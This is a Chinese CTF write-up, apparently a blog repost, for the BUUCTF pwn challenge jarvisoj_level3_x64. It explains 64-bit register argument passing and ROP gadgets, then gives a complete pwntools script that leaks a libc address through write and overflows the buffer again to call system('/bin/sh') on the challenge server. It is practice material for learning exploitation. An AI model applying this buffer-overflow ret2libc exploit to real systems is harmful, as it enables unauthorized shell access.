其他分享
首页 > 其他分享> > BUUCTF(pwn)jarvisoj_level3_x64

BUUCTF(pwn)jarvisoj_level3_x64

作者:互联网

在这里插入图片描述
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 )

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。

这里我们使用 write 函数 来泄密 libc地址

ssize_t write(int fd,const void*buf,size_t count); 参数说明:
fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数

write 函数的特殊之处是 它具有多个参数;

这里我们需要获得3个寄存器的地址来 存取参数;
在这里插入图片描述
在这里插入图片描述rdi = 0x4006b3

rsi = 0x4006b1

这里 rsi 这个地址后面还跟着一个 寄存器 r15; 刚好够了3个寄存器 来供我们输入参数;

下面就是一些基本的ropexp;

from pwn import *
from LibcSearcher import *
r=remote('node3.buuoj.cn',29161)
elf=ELF("./1")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x40061A
rdi=0x4006b3
rsi=0x4006b1
payload='a'*(0x80+0x8)+p64(rdi)+p64(1)+p64(rsi)+p64(write_got)+p64(8)+p64(write_plt)+p64(main)
r.sendlineafter("Input:\n",payload)
write_addr = u64(r.recv(8))
libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
sys=offset+libc.dump('system')
binsh=offset+libc.dump('str_bin_sh')
payload='a'*(0x80+0x8)+p64(rdi)+p64(binsh)+p64(sys)
r.sendlineafter("Input:\n",payload)
r.interactive()

对exp有疑问的欢迎留言

标签:BUUCTF,p64,libc,write,jarvisoj,参数,pwn,rdi,rsi
来源: https://blog.csdn.net/weixin_45556441/article/details/115383250